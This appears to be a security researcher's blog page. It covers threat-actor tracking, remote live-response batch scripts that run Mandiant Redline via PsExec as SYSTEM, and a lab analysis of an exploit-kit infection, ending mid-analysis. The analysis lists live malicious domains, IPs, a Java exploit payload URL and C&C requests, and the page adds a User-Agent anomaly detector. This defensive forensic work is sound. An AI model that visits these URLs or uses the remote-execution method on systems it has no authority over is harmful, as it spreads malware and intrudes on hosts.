<h2>Who is "DESKTOP-Group"?</h2>
<p><i>c-APT-ure blog, by TomU. Posted 2022-01-26, last updated 2023-07-06.</i></p>
<p><span style="color: #cc0000;"><b>Update 2023-07-05:</b></span> Suspected key figure of notorious cybercrime group arrested in joint operation. Operation Nervone has dealt a significant blow to the OPERA1ER group.</p>
<p><a href="https://www.interpol.int/en/News-and-Events/News/2023/Suspected-key-figure-of-notorious-cybercrime-group-arrested-in-joint-operation">INTERPOL announcement about Operation Nervone</a></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhk8vkmY8U89jdgeTSHpUwMBZhKLyxmGMuQh2QB-1-VsSGuQqb5CzOABGMbVIKcgtizZzj6f-zd-o8K61Ov7Pono03Z0TxiRLRFQsS0S8MPfkxOCLvXHq9ZBuYSfKJoquKNLbDKumaKrFUe0ilABiMpoRiSbpv_Rxz4Db8m0MDacdUqVfvIrJXjvZZCelMv" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="367" data-original-width="759" height="217" src="https://blogger.googleusercontent.com/img/a/AVvXsEhk8vkmY8U89jdgeTSHpUwMBZhKLyxmGMuQh2QB-1-VsSGuQqb5CzOABGMbVIKcgtizZzj6f-zd-o8K61Ov7Pono03Z0TxiRLRFQsS0S8MPfkxOCLvXHq9ZBuYSfKJoquKNLbDKumaKrFUe0ilABiMpoRiSbpv_Rxz4Db8m0MDacdUqVfvIrJXjvZZCelMv=w448-h217" width="448" /></a></div>
<p><span style="color: #cc0000;"><b>Update 2022-11-06:</b></span> A few days ago Group-IB released the report "<i>OPERA1ER - Playing God without permission</i>" (<a href="https://www.group-ib.com/resources/threat-research/opera1er.html" target="_blank">blog</a>, <a href="https://github.com/c-APT-ure/my-public-stuff/blob/master/Group-IB_RPRT_OPERA1ER_EN_full.pdf" target="_blank">report PDF</a>, <a href="https://www.youtube.com/watch?v=B6C8laHIQhk" target="_blank">webinar</a>), linking different aliases to "<i>DESKTOP-Group</i>":</p>
<ul style="text-align: left;">
<li>Group-IB: OPERA1ER</li>
<li>Orange-CERT-CC: NXSMS</li>
<li>SWIFT: Common Raven</li>
<li>Symantec: Bluebottle</li>
<li>Mandiant: UNC4044 <i>(not in the report)</i></li>
</ul>
<p>--</p>
<p>This is just a preliminary post about my research into a threat actor (TA) or threat group (TG) that we have named "DESKTOP-Group". Other companies (Orange-CERT, Group-IB, SWIFT) have other names for this TA, but those are not publicly known or linked yet. <i>(I will update this post as soon as more becomes public.)</i></p>
<p>We started tracking this TA's activity in early 2018, while analyzing the first malware-laden attack mails during February 2018. For the next three years, we saw and analyzed 170 distinct attack mails (campaigns) from this TA, but during 2021 it became harder to link malware mails back to them with high confidence.</p>
<p>The first public presentation, "<i>DESKTOP-Group – Tracking a Persistent Threat Group (using Email Headers)</i>", was at <a href="https://www.botconf.eu/botconf-2019/schedule/" target="_blank">BotConf 2019</a>. Slides (<a href="https://github.com/c-APT-ure/my-public-stuff/blob/master/BotConf-2019_DESKTOP-Group_Tom-Ueltschi_PUBLIC.pdf" target="_blank">PDF</a>) are available from my <a href="https://github.com/c-APT-ure/my-public-stuff/" target="_blank">Github repo</a>.</p>
<p>In 2020, I also presented about this TA at the ReversingLabs <a href="https://twitter.com/search?q=%23Reversing2020&src=typed_query&f=live" target="_blank">#Reversing2020</a> online conference. A <a href="https://www.youtube.com/watch?v=bha-TpjXwwg" target="_blank">video</a> (starts around <a href="https://youtu.be/bha-TpjXwwg?t=873" target="_blank">14:30</a>) and <a href="https://www.reversinglabs.com/hubfs/Reversing%202020/Presentations/Tom%20Ueltschi%20Presentation.pdf" target="_blank">PDF slides</a> are also available.</p>
<p>In 2019, I started sharing on Twitter about this TA, later using the hashtag <a href="https://twitter.com/search?q=%23DESKTOPgroup&src=typed_query&f=live" target="_blank">#DESKTOPgroup</a>.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-oxQw-d-qaqM/YfFCCJJa0gI/AAAAAAAACa4/RCFHf65WFNImdGW7ZiDEtynxZI9chRlsgCNcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="699" data-original-width="603" height="396" src="https://lh3.googleusercontent.com/-oxQw-d-qaqM/YfFCCJJa0gI/AAAAAAAACa4/RCFHf65WFNImdGW7ZiDEtynxZI9chRlsgCNcBGAsYHQ/w341-h396/image.png" width="341" /></a></div>
<p>There is also a <a href="https://groups.google.com/g/desktop-group-research" target="_blank">closed Google group for research collaboration</a>, mostly with people tracking or having access to emails or logs related to this TA's activity.</p>
<p>Malware samples and URLs have been shared and tagged on Abuse.ch <a href="https://bazaar.abuse.ch/browse/tag/DESKTOP-group/" target="_blank">Malware Bazaar</a> or <a href="https://urlhaus.abuse.ch/browse/tag/DESKTOP-group/" target="_blank">URLhaus</a>.</p>
<h2>Is this blog still alive?</h2>
<p><i>Posted 2017-12-06, last updated 2022-01-26, by TomU.</i></p>
<p>Is this blog still alive? That's a valid question since I haven't blogged for quite some time.</p>
<p><i>(wow, has it really been more than 3 years!?)</i></p>
<p>So I finally decided to write another post about some stuff that happened in the meantime...</p>
<p>For the past few years I have been more active on Twitter (<a href="https://twitter.com/c_APT_ure" target="_blank">@c_APT_ure</a>), presenting at conferences and collaborating in closed / trusted groups.</p>
<p>My most recent area of interest has been increasing endpoint visibility using <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon" target="_blank">Sysinternals Sysmon</a> and sending the logs into Splunk for incident detection and threat hunting.</p>
<p>My first presentation on this was in December 2016 at BotConf:</p>
<p><i>"<a href="https://www.botconf.eu/2016/advanced-incident-detection-and-threat-hunting-using-sysmon-and-splunk/" target="_blank">Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk)</a>"</i></p>
<p>Slides: <a href="https://www.botconf.eu/wp-content/uploads/2016/11/PR12-Sysmon-UELTSCHI.pdf">https://www.botconf.eu/wp-content/uploads/2016/11/PR12-Sysmon-UELTSCHI.pdf</a><br />
Video: <a href="https://www.youtube.com/watch?v=vv_VXntQTpE">https://www.youtube.com/watch?v=vv_VXntQTpE</a></p>
<p>In 2017 I gave an updated version on the same topic at the FIRST annual conference.</p>
<p>Slides: <a href="https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf">https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf</a></p>
<p>In April 2018 at <a href="https://www.first.org/events/colloquia/amsterdam2018/program#pAdvanced-Incident-Detection-and-Threat-hunting-with-Sysmon-Splunk" target="_blank">FIRST TC Amsterdam</a>, I gave an updated version of the FIRST 2017 talk.</p>
<p>Slides: <a href="http://security-research.dyndns.org/pub/slides/FIRST-TC-2018/FIRST-TC-2018_Tom-Ueltschi_Sysmon_PUBLIC.pdf">FIRST-TC-2018_Tom-Ueltschi_Sysmon_PUBLIC.pdf</a> (<a href="https://github.com/c-APT-ure/my-public-stuff/blob/master/FIRST-TC-2018_Tom-Ueltschi_Sysmon_PUBLIC.pdf" target="_blank">Github</a> / <a href="https://github.com/c-APT-ure/my-public-stuff/raw/master/FIRST-TC-2018_Tom-Ueltschi_Sysmon_PUBLIC.pdf">raw | D/L</a>)</p>
<p>At BotConf 2018, I presented again on using Sysmon and Splunk, this time also covering PowerShell logging and MITRE ATT&CK.<br />
"<a href="https://www.botconf.eu/botconf-2018/botconf-2018-schedule/" target="_blank">Hunting and Detecting APTs using Sysmon and PowerShell Logging</a>"</p>
<p>Slides: <a href="https://www.botconf.eu/wp-content/uploads/2018/12/2018-Tom-Ueltschi-Sysmon.pdf" target="_blank">2018-Tom-Ueltschi-Sysmon.pdf</a><br />
Video: <i>(was recorded and will be published soon)</i></p>
<p>CERT-EU annual conference 2019, presentation on "Practical Threat Hunting"<br />
Slides: [<a href="https://github.com/c-APT-ure/my-public-stuff/blob/master/CERT-EU-2019_Threat-Hunting_Tom-Ueltschi_TLP-WHITE.pdf" target="_blank">github</a> / <a href="https://github.com/c-APT-ure/my-public-stuff/raw/master/CERT-EU-2019_Threat-Hunting_Tom-Ueltschi_TLP-WHITE.pdf" target="_blank">raw | D/L</a>]</p>
<p>BotConf 2019<br />
<a href="https://botconf2019.sched.com/event/VrbL/desktop-group-tracking-a-persistent-threat-group-using-email-headers" target="_blank">"DESKTOP-Group" – Tracking a Persistent Threat Group (using Email Headers)</a><br />
Slides should be published soon. (<a href="https://twitter.com/c_APT_ure/status/1179062052150743040">Tweet</a>)</p>
<p><span style="color: red;">For anything related to "DESKTOP-Group", please see my later post:</span><br />
<a href="http://c-apt-ure.blogspot.com/2022/01/who-is-desktop-group.html">http://c-apt-ure.blogspot.com/2022/01/who-is-desktop-group.html</a></p>
<p>Most presentation slides should also be available on <a href="https://github.com/c-APT-ure/my-public-stuff" target="_blank">my Github page</a>.</p>
<p>There are many good resources for further reading that I can suggest.</p>
<ul>
<li><a href="https://github.com/MHaggis/sysmon-dfir" target="_blank">Sysmon - DFIR</a> (Mike Haag / @MHaggis)
<ul>
<li><a href="https://github.com/MHaggis/sysmon-dfir#sysmon-configuration" target="_blank">Sysmon Config files</a></li>
</ul>
</li>
<li><a href="https://github.com/Cyb3rWard0g/ThreatHunter-Playbook" target="_blank">ThreatHunter-Playbook</a> (Roberto Rodriguez / @Cyb3rWard0g)</li>
<li><a href="https://github.com/Neo23x0/sigma/tree/master/rules/windows/sysmon" target="_blank">SIGMA rules for Sysmon</a> (Florian Roth / @cyb3rops)</li>
<li><a href="https://www.darkoperator.com/blog/2017/11/24/operational-look-at-sysinternals-sysmon-620-update" target="_blank">Operational Look at Sysinternals Sysmon 6.20 Update</a></li>
<li>Technet Blog: <a href="https://blogs.technet.microsoft.com/motiba/2017/12/07/sysinternals-sysmon-suspicious-activity-guide/" target="_blank">Sysinternals Sysmon suspicious activity guide</a></li>
</ul>
<p>The list of resources may get updated every so often...</p>
<p style="font-size: x-small;"><i>(last updated: 2022-01-26)</i></p>
<h2>3R4LR - Running Redline Remotely for Live Response</h2>
<p><i>Posted 2014-08-12, last updated 2017-12-06, by TomU.</i></p>
<div style="text-align: center;"><span style="color: red;"><strike>This blog post is a work in progress and I'd love to get feedback while writing it.</strike></span></div>
<div style="text-align: center;"><span style="color: red;"><strike>So while this note appears on top, the blog post is not finished.</strike></span></div>
<div style="text-align: center;"><span style="color: red;"><i><strike>(Please come back again later!)</strike></i></span><br />
<span style="color: red;">This blog post will likely not be updated (finished) anymore, sorry!</span></div>
<br />
This is the second post about using Redline for Live Response. The first post covered <a href="http://c-apt-ure.blogspot.com/2014/07/using-redline-for-live-response-part-1.html" target="_blank">Using Redline for Live Response - Part 1</a>, showing how many details from artifacts can be collected with Redline.<br />
<br />
Let's take a look at the steps necessary for running Redline Collector remotely.<br />
<br />
<ol>
<li>copy the collector to the host</li>
<li>run the collector on the host</li>
<li>compress the collection data (optional)</li>
<li>copy the collection data back</li>
</ol>
<br />
I'm sure there are many ways to accomplish this, but here is the way I did it.<br />
<br />
A short batch script, taking a hostname as parameter, uses PsExec to copy a remote script to the host and execute it there. The remote script is what actually performs the steps described above.<br />
<br />
Prerequisites:<br />
<ul>
<li>read-only network share (for the collector source)
<ul>
<li><span style="font-family: 'Courier New', Courier, monospace;">\\RO-Share-Host\Redline\</span></li>
</ul>
</li>
<li>writable network share (to copy the collection data back)
<ul>
<li><span style="font-family: 'Courier New', Courier, monospace;">\\RW-Share-Host\Data-Upload\</span></li>
</ul>
</li>
<li>PsExec rights (as admin) on the remote host for the user starting the scripts; quick check:
<ul>
<li><span style="font-family: 'Courier New', Courier, monospace;">D:\Tools\Sysinternals><span style="background-color: yellow;">psexec -s \\hostname cmd /c whoami</span></span>
<ul>
<li><span style="font-family: 'Courier New', Courier, monospace;">--> nt authority\system</span></li>
</ul>
</li>
</ul>
</li>
</ul>
<br />
Considerations / Disadvantages:<br />
<ul>
<li>needs privileged credentials for running the collector remotely</li>
<li>the collector software and the collection data are written to the host's disk and overwrite unallocated space (i.e. the hard disk of the host under investigation is modified)</li>
</ul>
<br />
Here are the two scripts, just slightly modified (anonymized) from the original previously used. <i>(I hope I didn't introduce any typos or find/replace errors -- if so, please let me know)</i><br />
<p>run-redline.cmd (takes the hostname as parameter and starts the remote script via PsExec):</p>
<pre>
REM ============================================================================
REM | Usage: run-redline.cmd hostname
REM ============================================================================
@echo off

REM check if remote host is online
ping -n 1 %1 >NUL || echo Client %1 is offline. && goto FINISHED

echo Running Redline Collector remotely on System: %1
time /t

REM copy run-redline-remote.cmd to the host (-c) and run it there as SYSTEM (-s);
REM the remote script's console output is appended to a per-host log file
D:\Tools\Sysinternals\psexec.exe -accepteula \\%1 -s -c D:\Tools\Mandiant\Redline\run-redline-remote.cmd %1 >> E:\Data-Upload\Audits\%1_Redline_Log.txt

REM "sleep" is not a cmd.exe built-in (assumed: sleep.exe from the Windows Resource Kit on the PATH)
sleep 3

REM unpack the 7z archive the remote script copied back
REM (E:\Data-Upload\Audits is assumed to be the local path behind \\RW-Share-Host\Data-Upload\Audits)
D:\Tools\7z.exe x -oE:\Data-Upload\Audits\%1 E:\Data-Upload\Audits\%1\audit_%1.7z

move E:\Data-Upload\Audits\%1_Redline_Log.txt E:\Data-Upload\Audits\%1\

dir /s E:\Data-Upload\Audits\%1

:FINISHED
echo *** Finished Redline Collector script !!!
time /t
</pre>
<p>run-redline-remote.cmd (copied to and executed on the remote host by PsExec):</p>
<pre>
REM ============================================================================
REM | Usage: run-redline-remote.cmd hostname
REM ============================================================================
@echo off

REM create new dir for Redline Collector
mkdir C:\Redline
cd C:\Redline

echo Starting "run-redline-remote.cmd" on System: %1 >> run-redline-remote.log
time /t >> run-redline-remote.log

REM copy Redline Collector executable and scripts from share
xcopy /E /C /Y /Q \\RO-Share-Host\Redline\Redline-Collector-Latest .
sleep 10
dir /s

rem ----------------------------------------------------------------------------
rem include Helper.bat (using "call Helper.bat" didn't work)
rem ----------------------------------------------------------------------------

SETLOCAL enableextensions enabledelayedexpansion

ECHO Ensuring the proper working directory
REM NOTE: %~dp0 is the directory this script was started from; with "psexec -c"
REM that is the remote Windows directory, not C:\Redline. If the agent (or 7z.exe
REM below) is reported as not found, remove the next two lines (left as in the original).
%~d0
cd %~dp0

REM Verify the files exist
SET agent64=.\x64\MIRAgent.exe
SET agent32=.\x86\MIRAgent.exe
SET script=MemoryzeAuditScript.xml
SET outputdir=.
SET bitness=%PROCESSOR_ARCHITECTURE%

IF NOT EXIST "%agent64%" GOTO :failed
REM IF NOT EXIST "%agent32%" GOTO :failed
IF NOT EXIST "%script%" GOTO :failed

IF "%1"=="" GOTO :usedefault
SET outputdir=%1
:usedefault
REM Check that the directory exists, and if not create it.
IF NOT EXIST "%outputdir%" CALL mkdir "%outputdir%"

SET args=-o "..\%outputdir%" -f -script "..\%script%" -encoding none -allowmultiple

SET agent=%agent32%
IF "%bitness%"=="x86" GOTO :agentset
IF "%bitness%"=="IA64" GOTO :unsupported
SET agent=%agent64%
:agentset

ECHO %agent% %args%
REM PAUSE
call %agent% %args%

GOTO :end

:failed
ECHO.
ECHO.
ECHO Failure Encountered:
ECHO Agent and/or Redline Audit Script not found.
GOTO :end

:unsupported
ECHO.
ECHO.
ECHO Failure Encountered:
ECHO This Operating System is not supported by the Memoryze Agent
GOTO :end

:auditfail
REM (never jumped to in this script; carried over from Helper.bat, %lastcmd% and %buildlog% are not set here)
ECHO.
ECHO.
ECHO Failure Encountered
ECHO %errorlevel% return from "%lastcmd%"
IF EXIST "%buildlog%" START notepad "%buildlog%"
GOTO :end

:end
REM PAUSE
ENDLOCAL
rem ----------------------------------------------------------------------------

echo Finished "run-redline-remote.cmd" on System: %1 >> run-redline-remote.log
time /t >> run-redline-remote.log

mkdir \\RW-Share-Host\Data-Upload\Audits\%1
rem copy run-redline-remote.log \\RW-Share-Host\Data-Upload\Audits\%1

rem ** copy collection without compression
rem xcopy /E /C /Y %1 \\RW-Share-Host\Data-Upload\Audits\%1

rem ** copy collection WITH (7z) compression
7z.exe a audit_%1.7z %1
copy audit_%1.7z \\RW-Share-Host\Data-Upload\Audits\%1

sleep 20

echo Finished "run-redline-remote.cmd" on System: %1 >> run-redline-remote.log
time /t >> run-redline-remote.log

copy run-redline-remote.log \\RW-Share-Host\Data-Upload\Audits\%1
</pre>
<br />
<span style="color: red;">The scripts are provided <i>as is</i> without any warranty. Use at your own risk. They may be changed without notice.</span><br />
<br />
I will update this post later with a PoC running the scripts "remotely" from the VM-host on the infected VM from the previous post.<br />
<br />
Stay tuned for more...<br />
<br />
Cheers,<br />
@c_APT_ure<br />
<br />
<h2>Using Redline for Live Response - Part 1</h2>
<p><i>Posted 2014-07-29, last updated 2014-08-12, by TomU.</i></p>
<span style="font-family: Arial,Helvetica,sans-serif;">For once I'll write about something a bit different than before. It's still about <a href="http://c-apt-ure.blogspot.com/2013/12/ponmocup-hunter-is-re-tired.html" target="_blank">Ponmocup</a> malware, or more precisely about the Zuponcic Kit used for delivery, but mostly about how to do Live Response and detection on the host using Redline.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">If you're not familiar with the Zuponcic Kit yet, you should read the following posts:</span><br />
<ul>
<li><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://blog.fox-it.com/2013/12/19/not-quite-the-average-exploit-kit-zuponcic/" target="_blank">Not quite the average exploit kit: Zuponcic</a></span></li>
<li><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://malwageddon.blogspot.com/2013/06/zuponcic-is-it-bird-is-it-plane-no-its.html" target="_blank">Zuponcic: "Is it a bird?... Is it a plane?... No, it's another Exploit Kit" - Part 1</a></span></li>
<li><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://malwageddon.blogspot.com/2013/08/zuponcic-is-it-bird-is-it-plane-no-its.html" target="_blank">Zuponcic: "Is it a bird?... Is it a plane?... No, it's another... wait, what!?" - Part 2</a></span></li>
<li><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://malware-traffic-analysis.net/2014/03/17/index.html" target="_blank">2014-03-17 - ZUPONCIC EK</a></span></li>
<li><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://malware-traffic-analysis.net/2014/07/09/index.html" target="_blank">2014-07-09 - ZUPONCIC EK FROM 178.33.152.221 - MZ.WATCHWEEDSEPISODES.NET</a></span></li>
</ul>
<span style="font-family: Arial,Helvetica,sans-serif;">If you're not familiar with <a href="https://www.mandiant.com/resources/download/redline" target="_blank">Redline</a>, the great free tool from Mandiant, I recommend reading the following:</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.mandiant.com/library/Redline1.12_UserGuide.pdf" target="_blank">Redline User Guide</a> (latest version at the time of writing: v1.12)</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">You should be familiar with the two distinct phases, collection and analysis, and with the difference between a "Redline Collector" (a standalone CLI tool for collection) and "Redline", the feature-rich GUI application for analyzing the collected data.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">So, for this blog post I infected a VM via the Zuponcic Kit, capturing the network traffic with Wireshark and doing a Redline collection and analysis afterwards.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<br />
<h2>
<span style="font-family: Arial,Helvetica,sans-serif;">PCAP analysis with Wireshark</span></h2>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">Here is an overview of the DNS and HTTP traffic from the infection:</span><br />
<div class="separator" style="clear: both; text-align: left;">
<a href="http://4.bp.blogspot.com/-rZNIrNmNph8/U8wina3hnYI/AAAAAAAAAXo/_pt7cUY4W1M/s1600/2014-07-15_141845.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-rZNIrNmNph8/U8wina3hnYI/AAAAAAAAAXo/_pt7cUY4W1M/s1600/2014-07-15_141845.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://1.bp.blogspot.com/-v-4pj0i2ruU/U8windeRwXI/AAAAAAAAAXk/eSGQUtQM058/s1600/2014-07-15_141933.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-v-4pj0i2ruU/U8windeRwXI/AAAAAAAAAXk/eSGQUtQM058/s1600/2014-07-15_141933.png" height="*" width="800" /></a></div>
<br />
<p><span style="font-family: Arial,Helvetica,sans-serif;">Some of the most interesting DNS and HTTP requests are:</span></p>
<p><b><span style="font-family: Arial,Helvetica,sans-serif;">DNS:</span></b></p>
<pre>www.niceshop.at: type A, class IN, addr 85.13.129.172
<span style="background-color: yellow;">perrugina.sciencehunk.com: type A, class IN, addr 31.210.96.155</span>
<span style="background-color: yellow;">mw.prodigymsnteregala.com: type A, class IN, addr 178.33.192.35</span>
<span style="background-color: yellow;">fasternation.net: type A, class IN, addr 253.101.238.123</span>
www.sanctionedmedia.com: type CNAME, class IN, cname sanctionedmedia.com
sanctionedmedia.com: type A, class IN, addr 64.210.128.29
</pre>
<p><b><span style="font-family: Arial,Helvetica,sans-serif;">HTTP:</span></b></p>
<p><span style="font-family: Arial,Helvetica,sans-serif;">Default browser UA:</span></p>
<pre> User-Agent: Mozilla/4.0 (compatible; <span style="background-color: yellow;">MSIE 8.0; Windows NT 6.1; WOW64;</span> Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
</pre>
<pre>http://www.google.ch/url?url=http://www.niceshop.at/&rct=j&frm=1&q=&esrc=s&sa=U&ei=eQHDU9acLdP07Aa-oICIAg&ved=0CBQQFjAA&usg=AFQjCNHz4D179x2aXXoTOLfSK_k71qrAlw

http://www.niceshop.at/

http://perrugina.sciencehunk.com/__utm.gif?utmwv=5.3.3&utms=7&utmn=1812125645&utmhn=isroi.com&utmcs=UTF-8&utmsr=800x600&utmvp=783x444&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0%20r22&utmdt=Gambar%20Animasi%20

http://mw.prodigymsnteregala.com/

http://mw.prodigymsnteregala.com/<span style="background-color: yellow;">js/java.js</span>

http://mw.prodigymsnteregala.com/<span style="background-color: yellow;">ANLxMYn.jar</span>

http://mw.prodigymsnteregala.com/ (POST)
 Content-Type: application/x-www-form-urlencoded
 <span style="background-color: yellow;">User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11</span>
 Content-Length: 90
</pre>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> i=2ZUpfq7G6Ke3q42Ny1c19p61...E78IJH3yVQJZL70k67ZEPHn9kW</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">Response: </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> Content-Type: application/octet-stream</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">Content-Length: 957688</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">Content-Disposition: attachment; filename="xuqfvb"</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> Last-Modified: Sun, 13 Jul 2014 22:01:35 GMT</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> <i>Time since request: 9.267738000 seconds</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">http://93.115.88.220/listing/chn/all.html</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> User-Agent: Mozilla/4.0 (compatible; <span style="background-color: yellow;">MSIE 7.0</span>; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="background-color: yellow;">Wrong IE version in UA!</span><i> The C&C request claims MSIE 7.0 but keeps Trident/4.0 (the IE8 engine token) and every other token of the browser's real User-Agent seen above: the malware apparently copied the host's UA string and changed only the major version. Note that IE8 in Compatibility View legitimately sends exactly this "MSIE 7.0 ... Trident/4.0" combination, so the string on its own is only a weak indicator; what makes it suspicious here is the same host switching IE versions between requests within seconds.</i></span></div>
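<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">The observation above can be turned into a proxy-log check. The following is an added example written for this post, not code from the original article or from any product: it flags the Java runtime talking HTTP on its own, MSIE/Trident combinations that disagree (a hint only, because of Compatibility View), and, the strong signal from this capture, one client sending the same UA string with different MSIE major versions. The tab-separated log format, the client IP and the method column are constructed; the User-Agent strings are the ones from the capture above.</span></div>

```python
import re
from collections import defaultdict

# Trident (MSHTML) engine token -> IE major version that ships it (Microsoft's documented
# UA tokens: IE8 = Trident/4.0, IE9 = 5.0, IE10 = 6.0, IE11 = 7.0).
TRIDENT_TO_MSIE = {"4.0": 8, "5.0": 9, "6.0": 10, "7.0": 11}
MSIE_RE = re.compile(r"MSIE (\d+)\.\d+")
TRIDENT_RE = re.compile(r"Trident/(\d+\.\d+)")
JAVA_RE = re.compile(r"\bJava/\d")

def ua_skeleton(ua):
    """The UA with its MSIE major version blanked, so strings that differ only there collapse."""
    return MSIE_RE.sub("MSIE X", ua)

def trident_mismatch(ua):
    """Return (claimed, implied) when the MSIE version disagrees with the Trident token, else None.
    IE8 in Compatibility View legitimately sends 'MSIE 7.0 ... Trident/4.0', so treat this as a hint."""
    m_msie, m_trident = MSIE_RE.search(ua), TRIDENT_RE.search(ua)
    if not (m_msie and m_trident) or m_trident.group(1) not in TRIDENT_TO_MSIE:
        return None
    claimed, implied = int(m_msie.group(1)), TRIDENT_TO_MSIE[m_trident.group(1)]
    return (claimed, implied) if claimed != implied else None

def find_ua_anomalies(log_lines):
    """log_lines: 'src_ip<TAB>method<TAB>url<TAB>user-agent' records (a constructed proxy log
    layout, not any product's). Returns a list of (src_ip, kind, detail) findings."""
    findings = []
    versions_by_host = defaultdict(lambda: defaultdict(set))  # src -> skeleton -> {MSIE majors}
    for line in log_lines:
        src, method, url, ua = line.rstrip("\n").split("\t", 3)
        if JAVA_RE.search(ua):  # the Java runtime itself talking HTTP, e.g. the JAR's downloader
            findings.append((src, "java-client", f"{method} {url}"))
        mm = trident_mismatch(ua)
        if mm:
            findings.append((src, "trident-mismatch", f"MSIE {mm[0]} but Trident implies IE {mm[1]}: {url}"))
        m = MSIE_RE.search(ua)
        if m:
            versions_by_host[src][ua_skeleton(ua)].add(int(m.group(1)))
    # The strong signal from this capture: one host, one UA string, but the IE major version changes.
    for src, skeletons in versions_by_host.items():
        for skel, majors in skeletons.items():
            if len(majors) > 1:
                findings.append((src, "version-flip", f"MSIE {sorted(majors)} with otherwise identical UA: {skel}"))
    return findings

# Constructed sample log: one host walking the chain described in this post. The UA strings
# are taken from the capture; the client IP, method column and layout are made up.
IE8_UA = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; "
          ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)")
SAMPLE_LOG = [
    "10.0.0.5\tGET\thttp://www.niceshop.at/\t" + IE8_UA,
    "10.0.0.5\tGET\thttp://mw.prodigymsnteregala.com/js/java.js\t" + IE8_UA,
    "10.0.0.5\tPOST\thttp://mw.prodigymsnteregala.com/\tMozilla/4.0 (Windows 7 6.1) Java/1.7.0_11",
    "10.0.0.5\tGET\thttp://93.115.88.220/listing/chn/all.html\t" + IE8_UA.replace("MSIE 8.0", "MSIE 7.0"),
]

if __name__ == "__main__":
    for src, kind, detail in find_ua_anomalies(SAMPLE_LOG):
        print(f"{src}\t{kind}\t{detail}")
```

<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Run against the sample log this reports three findings for 10.0.0.5: the Java client POST, the MSIE 7.0/Trident 4.0 mismatch on the C&C request, and the version flip between the two IE strings. The version-flip check is the one worth keeping in a detection pipeline; the Trident check alone would also fire on every IE8 user in Compatibility View.</span></div>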
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial,Helvetica,sans-serif;">Detailed HTTP traffic of the Zuponcic Kit infection and initial C&C:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
